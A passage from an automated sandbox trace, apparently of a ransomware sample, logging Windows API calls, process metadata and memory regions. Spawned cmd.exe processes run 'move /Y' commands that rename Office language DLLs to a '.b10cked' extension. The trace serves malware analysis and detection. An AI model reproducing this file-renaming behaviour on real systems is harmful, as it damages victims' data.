lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f40c | out: lpFindFileData=0x16f40c) returned 0x3209f0 [0160.387] FindClose (in: hFindFile=0x3209f0 | out: hFindFile=0x3209f0) returned 1 [0160.387] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f40c | out: lpFindFileData=0x16f40c) returned 0x3209f0 [0160.387] FindClose (in: hFindFile=0x3209f0 | out: hFindFile=0x3209f0) returned 1 [0160.388] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0160.388] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0160.388] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0160.388] GetEnvironmentStringsW () returned 0x320210* [0160.388] FreeEnvironmentStringsW (penv=0x320210) returned 1 [0160.388] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.388] GetConsoleOutputCP () returned 0x1b5 [0160.389] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0160.389] GetUserDefaultLCID () returned 0x409 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f7d0, cchData=128 | out: lpLCData="0") returned 2 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f7d0, cchData=128 | out: lpLCData="0") returned 2 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f7d0, cchData=128 | out: lpLCData="1") returned 2 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0160.389] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0160.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0160.390] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0160.390] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0160.390] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0160.391] GetConsoleTitleW (in: lpConsoleTitle=0x310930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.391] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0160.391] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0160.391] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0160.391] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0160.392] _wcsicmp (_String1="move", _String2=")") returned 68 [0160.392] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0160.392] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0160.392] _wcsicmp (_String1="IF", _String2="move") returned -4 [0160.392] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0160.392] _wcsicmp (_String1="REM", _String2="move") returned 5 [0160.392] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0160.396] GetConsoleTitleW (in: lpConsoleTitle=0x16f4c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0160.398] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0160.398] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0160.398] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0160.398] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0160.398] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0160.398] _wcsicmp (_String1="move", _String2="CD") returned 10 [0160.398] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0160.398] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0160.398] _wcsicmp (_String1="move", _String2="REN") returned -5 [0160.398] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0160.398] _wcsicmp (_String1="move", _String2="SET") returned -6 [0160.398] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0160.398] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0160.398] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0160.398] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0160.399] _wcsicmp (_String1="move", _String2="MD") returned 11 [0160.399] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0160.399] _wcsicmp (_String1="move", _String2="RD") returned -5 [0160.399] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0160.399] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0160.399] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0160.399] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0160.399] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0160.399] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0160.399] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0160.399] _wcsicmp (_String1="move", _String2="VER") returned -9 [0160.399] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0160.399] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0160.399] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0160.399] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0160.399] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0160.399] _wcsicmp (_String1="move", _String2="START") returned -6 [0160.399] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0160.399] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0160.399] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0160.401] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.401] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0160.401] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f284, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f27c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f27c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0160.401] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0160.402] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0160.402] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0160.403] _wcsicmp (_String1="VISINT~1.TRX", _String2=".") returned 72 [0160.403] _wcsicmp (_String1="VISINT~1.TRX", _String2="..") returned 72 [0160.403] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visint~1.trx")) returned 0x2020 [0160.403] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0160.403] SetErrorMode (uMode=0x0) returned 0x0 [0160.403] SetErrorMode (uMode=0x1) returned 0x0 [0160.403] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX", nBufferLength=0x104, lpBuffer=0x16ec0c, lpFilePart=0x16ebf4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX", lpFilePart=0x16ebf4*="VISINT~1.TRX") returned 0x3c [0160.403] SetErrorMode (uMode=0x0) returned 0x1 [0160.403] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0160.403] _wcsicmp (_String1="VISINT~1.TRX", _String2=".") returned 72 [0160.403] _wcsicmp (_String1="VISINT~1.TRX", _String2="..") returned 72 [0160.403] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visint~1.trx")) returned 0x2020 [0160.404] SetErrorMode (uMode=0x0) returned 0x0 [0160.404] SetErrorMode (uMode=0x1) returned 0x0 [0160.404] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX", nBufferLength=0x104, lpBuffer=0x16f088, lpFilePart=0x16ee20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX", lpFilePart=0x16ee20*="VISINT~1.TRX") returned 0x3c [0160.404] SetErrorMode (uMode=0x0) returned 0x1 [0160.404] SetErrorMode (uMode=0x0) returned 0x0 [0160.404] SetErrorMode (uMode=0x1) returned 0x0 [0160.404] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16f290, lpFilePart=0x16ee20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked", lpFilePart=0x16ee20*="VISINTL.DLL.trx_dll.b10cked") returned 0x4b [0160.404] SetErrorMode (uMode=0x0) returned 0x1 [0160.404] SetLastError (dwErrCode=0x0) [0160.404] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visintl.dll.trx_dll.b10cked")) returned 0xffffffff [0160.404] GetLastError () returned 0x2 [0160.404] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x16e79c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16e79c) returned 0x322130 [0160.404] FindNextFileW (in: hFindFile=0x322130, lpFindFileData=0x16e79c | out: lpFindFileData=0x16e79c) returned 0 [0160.405] GetLastError () returned 0x12 [0160.405] FindClose (in: hFindFile=0x322130 | out: hFindFile=0x322130) returned 1 [0160.406] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x321cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321cc0) returned 0x322130 [0160.407] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x16ea34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0160.407] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x16ea34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x43 [0160.407] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visintl.dll.trx_dll")) returned 0x2020 [0160.407] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\visintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0160.407] FindClose (in: hFindFile=0x322130 | out: hFindFile=0x322130) returned 1 [0160.408] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16e9e8 | out: _Buffer=" 1") returned 9 [0160.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.408] GetFileType (hFile=0x7) returned 0x2 [0160.408] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0160.408] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16e974 | out: lpMode=0x16e974) returned 1 [0160.408] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.408] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e9a8 | out: lpConsoleScreenBufferInfo=0x16e9a8) returned 1 [0160.408] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0160.409] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16e9e8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0160.409] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16e9cc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16e9cc*=0x1a) returned 1 [0160.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.409] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0160.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0160.409] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.409] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0160.410] SetConsoleInputExeNameW () returned 0x1 [0160.410] GetConsoleOutputCP () returned 0x1b5 [0160.410] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0160.410] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.410] exit (_Code=0) Process: id = "273" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0x928" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22168 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22169 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22170 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22171 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 22172 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22173 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22174 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22175 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22176 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 22177 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22178 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22179 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22180 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22181 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 22182 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 22183 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22184 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22185 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22186 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22187 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22188 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22189 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22190 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22191 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22192 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 22193 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22194 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22195 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 22196 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22197 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 22198 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 22199 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 22200 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 22201 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 337 os_tid = 0xe74 [0160.849] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf88c | out: lpSystemTimeAsFileTime=0x1cf88c*(dwLowDateTime=0x9980aa80, dwHighDateTime=0x1d440a9)) [0160.849] GetCurrentProcessId () returned 0x928 [0160.849] GetCurrentThreadId () returned 0xe74 [0160.850] GetTickCount () returned 0x30f3c [0160.850] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf884 | out: lpPerformanceCount=0x1cf884*=21764147061) returned 1 [0160.853] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0160.853] __set_app_type (_Type=0x1) [0160.853] __p__fmode () returned 0x76b331f4 [0160.853] __p__commode () returned 0x76b331fc [0160.853] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0160.853] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0160.853] GetCurrentThreadId () returned 0xe74 [0160.853] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe74) returned 0x38 [0160.853] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0160.853] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0160.853] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.855] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0160.855] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf81c | out: phkResult=0x1cf81c*=0x0) returned 0x2 [0160.855] VirtualQuery (in: lpAddress=0x1cf853, lpBuffer=0x1cf7ec, dwLength=0x1c | out: lpBuffer=0x1cf7ec*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.855] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf7ec, dwLength=0x1c | out: lpBuffer=0x1cf7ec*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0160.855] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf7ec, dwLength=0x1c | out: lpBuffer=0x1cf7ec*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, 